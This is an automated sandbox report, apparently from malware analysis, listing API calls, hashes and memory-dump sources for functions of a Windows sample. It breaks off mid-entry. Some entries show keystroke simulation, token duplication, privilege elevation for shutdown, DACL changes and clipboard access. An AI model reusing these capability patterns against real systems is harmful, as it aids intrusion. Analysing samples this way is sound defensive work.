Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841546
Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841560
Part of subcall function 008414F7: __CxxThrowException@8.LIBCMT ref: 00841571

_memmove.LIBCMT ref: 0085D363

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$Exception@8Throw_malloc_memmove
String ID:
API String ID: 620504543-0
Opcode ID: 3bf14e606abf088ba2139b15b7a7e0877b932dc3602118f35885493407cab9a6
Instruction ID: 13655551dc6762cd3161594271a8287985e5494f57494f502a6b0a6c7feb95e9
Opcode Fuzzy Hash: 3bf14e606abf088ba2139b15b7a7e0877b932dc3602118f35885493407cab9a6
Instruction Fuzzy Hash: CE01E8B46005548FDB00DF68C8A1F16B7A1FF8A308F14C194DA098F356D631E85ACBA3

Uniqueness

Uniqueness Score: -1.00%

Function 0083ECD0, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

CharUpperBuffW.USER32(?,?), ref: 0083ED03

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharUpper_malloc
String ID:
API String ID: 1573836695-0
Opcode ID: 2bcda2741aeb3fa0b8066e2f8ac3e7aff949959aa2dcfe60fa3d0fa073927762
Instruction ID: cb02abe1df765421ee82e9a9946248f611f81bb2d916d204f5e1930ce942cf72
Opcode Fuzzy Hash: 2bcda2741aeb3fa0b8066e2f8ac3e7aff949959aa2dcfe60fa3d0fa073927762
Instruction Fuzzy Hash: E8F01D706006248BDB209F68E585726BBA4FF84B51F049199FD49CF286C734DC01CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00873C1D, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00873C38

Part of subcall function 00863D83: EnumProcesses.PSAPI(?,00000800,?,?,00873C4D,?,?,?,008D8178), ref: 00863DA0

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumProcesses_wcslen
String ID:
API String ID: 3303492691-0
Opcode ID: 49146be6c6b106ce0a1db08a3d1756f652cd6285f93f243311c44a520fe527d5
Instruction ID: 429d359caa31871d17121d01b674f9f44cb69c6db48fa3c760951f6822b57bfa
Opcode Fuzzy Hash: 49146be6c6b106ce0a1db08a3d1756f652cd6285f93f243311c44a520fe527d5
Instruction Fuzzy Hash: 88E06DB3A011583BD711AA8EBC85EDF735CFBD6264F144063F60DD7112A222AE5586F3

Uniqueness

Uniqueness Score: -1.00%

Function 00858748, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841546
Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841560
Part of subcall function 008414F7: __CxxThrowException@8.LIBCMT ref: 00841571

_memmove.LIBCMT ref: 0085877C

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$Exception@8Throw_malloc_memmove
String ID:
API String ID: 620504543-0
Opcode ID: fc5d55a1eaa8c1b6d494df43e7b6fe822fd9f4347701c8daea2cb550c08e6389
Instruction ID: c618720fa41f4c9a8f8cfe7fa6796073291e5682708aa4d9d999c6bef90e2ae6
Opcode Fuzzy Hash: fc5d55a1eaa8c1b6d494df43e7b6fe822fd9f4347701c8daea2cb550c08e6389
Instruction Fuzzy Hash: F401C9B8600541DFDB04DF68C4E1F1277A5FF8A304F248194E209CF366DA31E956CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0083D9C0, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,00856F2F), ref: 0083D9DD

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 7de4e325bef5fb2cf7726cd2e6b466233ab8ad0fb3cecdb40ca5537af02ccebb
Instruction ID: b0ce5b85890220773634c38e3b19b779444142cad507af98ff82850949874877
Opcode Fuzzy Hash: 7de4e325bef5fb2cf7726cd2e6b466233ab8ad0fb3cecdb40ca5537af02ccebb
Instruction Fuzzy Hash: 06E0DEB5900B019A87318F5AE844516FBF8FFE46213248E1FD5A6C2A64D3B4A5898F50

Uniqueness

Uniqueness Score: -1.00%

Function 0083E270, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001,?,00002000), ref: 0083E288

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 329177fcf58e44af618bb0c807bb7c38ee3130155ddc3603453c4e47888fa01d
Instruction ID: 3de4279923401a9b8f4f4fd81dce9ebc4238d4e48f96a9a6e2871f4cec5c6658
Opcode Fuzzy Hash: 329177fcf58e44af618bb0c807bb7c38ee3130155ddc3603453c4e47888fa01d
Instruction Fuzzy Hash: 21E01275600208BFC704DFA4DC45DAA777DE748201F008258FD01D7340D671BD5086A1

Uniqueness

Uniqueness Score: -1.00%

Function 0086397D, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00863984

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8d3bb19ed993f850c0c7c23b0b76e71a6c5959f534fad1e0b4c091f22e317ed8
Instruction ID: 6e28305bd1222f44ebb101c7ed51873a6aac9e68b1575150a0e6a8cff60cdef5
Opcode Fuzzy Hash: 8d3bb19ed993f850c0c7c23b0b76e71a6c5959f534fad1e0b4c091f22e317ed8
Instruction Fuzzy Hash: 6EC08C31040308568E140AECA84D8E53F8CA943378B482B40F96CC75E1CA71BD939A50

Uniqueness

Uniqueness Score: -1.00%

Function 008448E2, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 008448EF

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
Instruction ID: 49c3d45f7970708e916728a01db055aae8898284aeb6e4a9c1c206298be5599b
Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
Instruction Fuzzy Hash: F4C0927244024C77CF112A86EC03F4A3F5AEBC0B61F049020FB1C19161AA73EA6196DA

Uniqueness

Uniqueness Score: -1.00%

Function 008A261D, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000007,00000000,00000000,?), ref: 008A262C

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: fd65361066d7219e4942a8d0625d5e1125fd940b6d12bc4718f59954aac17437
Instruction ID: 9e97d9c2bad9ee458192df3f4d309e5c9e0c58050ae12abb36d05664988350a7
Opcode Fuzzy Hash: fd65361066d7219e4942a8d0625d5e1125fd940b6d12bc4718f59954aac17437
Instruction Fuzzy Hash: 15C0923068C208FAFA304650CC4AF357629B700B01F200180B309A84C0C2A068044A18

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 008643FF, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00864407
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0086442D
IsIconic.USER32 ref: 00864436
ShowWindow.USER32(?,00000009), ref: 00864443
SetForegroundWindow.USER32(?), ref: 00864451
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00864468
GetCurrentThreadId.KERNEL32 ref: 0086446C
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0086447A
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00864489
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0086448F
AttachThreadInput.USER32(00000000,?,00000001), ref: 00864498
SetForegroundWindow.USER32(00000000), ref: 0086449E
MapVirtualKeyW.USER32(00000012,00000000), ref: 008644AD
keybd_event.USER32 ref: 008644B6
MapVirtualKeyW.USER32(00000012,00000000), ref: 008644C4
keybd_event.USER32 ref: 008644CD
MapVirtualKeyW.USER32(00000012,00000000), ref: 008644DB
keybd_event.USER32 ref: 008644E4
MapVirtualKeyW.USER32(00000012,00000000), ref: 008644F2
keybd_event.USER32 ref: 008644FB
SetForegroundWindow.USER32(00000000), ref: 00864505
AttachThreadInput.USER32(00000000,?,00000000), ref: 00864526
AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0086452C

Strings

Shell_TrayWnd, xrefs: 00864428

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 2889586943-2988720461
Opcode ID: 6d5945d045ef91d5967e5a9a9a6c074401dcbfe09a33e4bc80f72e7f5fb80975
Instruction ID: 7de3326503c51e5ea78bb7640c88f1da09a6aa44ac1b74b19217ef26a77fae4f
Opcode Fuzzy Hash: 6d5945d045ef91d5967e5a9a9a6c074401dcbfe09a33e4bc80f72e7f5fb80975
Instruction Fuzzy Hash: 1D4165727402187FE7205BA49C4EFBE7B6CFF55B11F10425AFA01EB1D0DAB059409BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00876219, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 234processCOMMON

Download Yara Rule

APIs

DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00876294
CloseHandle.KERNEL32(?), ref: 008762A6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008762BE
GetProcessWindowStation.USER32 ref: 008762D7
SetProcessWindowStation.USER32(00000000), ref: 008762E1
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008762FD
_wcslen.LIBCMT ref: 0087639E

Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

_wcsncpy.LIBCMT ref: 008763C6
LoadUserProfileW.USERENV(?,00000020), ref: 008763DF
CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 008763F9
CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00876428
UnloadUserProfile.USERENV(?,?), ref: 0087645B
CloseWindowStation.USER32(00000000), ref: 00876472
CloseDesktop.USER32(?), ref: 00876480
SetProcessWindowStation.USER32(?), ref: 0087648E
CloseHandle.KERNEL32(?), ref: 00876498
DestroyEnvironmentBlock.USERENV(?), ref: 008764AF

Strings

, xrefs: 0087624E
winsta0, xrefs: 008762B9
default, xrefs: 008762F8

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
String ID: $default$winsta0
API String ID: 3324942560-1027155976
Opcode ID: 1f0fb43d83c846ccbb971829db5c2df61dbd453c9d4d97fe34a39421b619c92c
Instruction ID: 78774f6ce6c83a5c3c8aad6cb053fced493741e721395d177e2db2dc8d980a88
Opcode Fuzzy Hash: 1f0fb43d83c846ccbb971829db5c2df61dbd453c9d4d97fe34a39421b619c92c
Instruction Fuzzy Hash: 1C814C70A00649ABDB10DFA8CC4AFAF7BB8FF48704F088209F914E7295E674D915CB65

Uniqueness

Uniqueness Score: -1.00%

Function 008633A3, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 008633B3
OpenProcessToken.ADVAPI32(00000000), ref: 008633BA
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 008633CF
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 008633F3
GetLastError.KERNEL32 ref: 008633F9
ExitWindowsEx.USER32(?,00000000), ref: 0086341C
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 0086344B
SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0086345E

Strings

SeShutdownPrivilege, xrefs: 008633C8

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
String ID: SeShutdownPrivilege
API String ID: 2938487562-3733053543
Opcode ID: 5af84a5959c818c480c67b390bd3d104736f8e3e56a089505372dd09bc8a1079
Instruction ID: 4afd4bf2c1b9a0f052e8633c57bde6c0a5011eb6d620a03eb33f2d7cf982058b
Opcode Fuzzy Hash: 5af84a5959c818c480c67b390bd3d104736f8e3e56a089505372dd09bc8a1079
Instruction Fuzzy Hash: 1E21D271740309ABFB209BA4EC4EFBAB7ACFB08711F144644FD09D61E1DAB69D0087A4

Uniqueness

Uniqueness Score: -1.00%

Function 0087602A, Relevance: 16.7, APIs: 11, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 00866DB5: GetUserObjectSecurity.USER32 ref: 00866DCF
Part of subcall function 00866DB5: GetLastError.KERNEL32(?,00000000,?), ref: 00866DD9
Part of subcall function 00866DB5: GetUserObjectSecurity.USER32 ref: 00866DFF

Part of subcall function 00866D81: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00866D9C

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00876090
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008760C4
GetLengthSid.ADVAPI32(?), ref: 008760D6
GetAce.ADVAPI32(?,00000000,?), ref: 00876113
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0087612F
GetLengthSid.ADVAPI32(?), ref: 00876147
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00876170
CopySid.ADVAPI32(00000000), ref: 00876177
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008761A9
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008761CB
SetUserObjectSecurity.USER32 ref: 008761DE

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 1255039815-0
Opcode ID: 24316dacc1856d391d6d641887338e8c0277dc8dc8ba2a7b22805115dcb38b29
Instruction ID: d91c17e4a868f0f4f52fdaab3085cf2f59b4bdeb5f1710e9a7027407cff23ad9
Opcode Fuzzy Hash: 24316dacc1856d391d6d641887338e8c0277dc8dc8ba2a7b22805115dcb38b29
Instruction Fuzzy Hash: 1F514971900619ABDB10DFA5CC88EAEBB79FF44700F04C609F529E7296E635DA15CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0088A0FC, Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0088A137
EmptyClipboard.USER32 ref: 0088A13D
CloseClipboard.USER32 ref: 0088A143
GlobalAlloc.KERNEL32(00000002,?,?,?), ref: 0088A163

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 4a525514aa72a07679560739ddb988005a85541bedf10e81da184b327930bf0a
Instruction ID: 1788fb94fb6dd25ab14025e78e6666aafc45b71de31b1fa090b888b16af0fd17
Opcode Fuzzy Hash: 4a525514aa72a07679560739ddb988005a85541bedf10e81da184b327930bf0a
Instruction Fuzzy Hash: 1141BF726102059FD714EFA8EC89BAEB7A4FF54312F108659F909DB2A1DB71A900CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 008742E1, Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00874320
GetKeyboardState.USER32(?), ref: 00874335
SetKeyboardState.USER32(?), ref: 00874389
PostMessageW.USER32 ref: 008743B9
PostMessageW.USER32 ref: 008743DA
PostMessageW.USER32 ref: 00874426
PostMessageW.USER32 ref: 0087444B

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: cccefd997dee8e078eb2837649537b39b5943f5be989f7d0c11a3d282942b4d7
Instruction ID: dbf4c5c427b801e0b0650b5dcc583f5d57d0c01e24611fd99492cddbadea7de4
Opcode Fuzzy Hash: cccefd997dee8e078eb2837649537b39b5943f5be989f7d0c11a3d282942b4d7
Instruction Fuzzy Hash: 9B51F5A05057D539F73282788845FB6BFA8BF06300F08D689F1DD955C7C3A8E894D765

Uniqueness

Uniqueness Score: -1.00%

Function 0089C06C, Relevance: 9.2, APIs: 6, Instructions: 231comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0089C0DC
_wcslen.LIBCMT ref: 0089C0EE
CreateBindCtx.OLE32(00000000,?), ref: 0089C198
MkParseDisplayName.OLE32(?,?,?,?), ref: 0089C1DE

Part of subcall function 00881AB8: GetLastError.KERNEL32(?,?,00000000), ref: 00881B16
Part of subcall function 00881AB8: VariantCopy.OLEAUT32(?,?), ref: 00881B6E
Part of subcall function 00881AB8: VariantCopy.OLEAUT32(-00000068,?), ref: 00881B84
Part of subcall function 00881AB8: VariantCopy.OLEAUT32(-00000088,?), ref: 00881B9D
Part of subcall function 00881AB8: VariantClear.OLEAUT32(-00000058), ref: 00881C17

CLSIDFromProgID.OLE32(00000000,?,?), ref: 0089C284
GetActiveObject.OLEAUT32(?,00000000,?), ref: 0089C29E

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$Copy$ActiveBindClearCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcslen
String ID:
API String ID: 2728119192-0
Opcode ID: 43522f815b2611d68807f49ccb2b0fb3ba2edced60677a2598db8215e283056f
Instruction ID: 4f3fe387a60b4953344f20222a72d75a7e20adeaa18a100e6c9ed76d6492c330
Opcode Fuzzy Hash: 43522f815b2611d68807f49ccb2b0fb3ba2edced60677a2598db8215e283056f
Instruction Fuzzy Hash: 0D814971618305ABDB04EBA8CC81F9BB3A8FF88704F144919F645D7291EB71E905CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00882408, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00831D10: _wcslen.LIBCMT ref: 00831D11
Part of subcall function 00831D10: _memmove.LIBCMT ref: 00831D57

FindFirstFileW.KERNEL32(?,?), ref: 00882455
Sleep.KERNEL32(0000000A), ref: 00882481
FindNextFileW.KERNEL32(?,?), ref: 0088255F
FindClose.KERNEL32(?), ref: 00882575

Strings

*.*, xrefs: 00882436

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
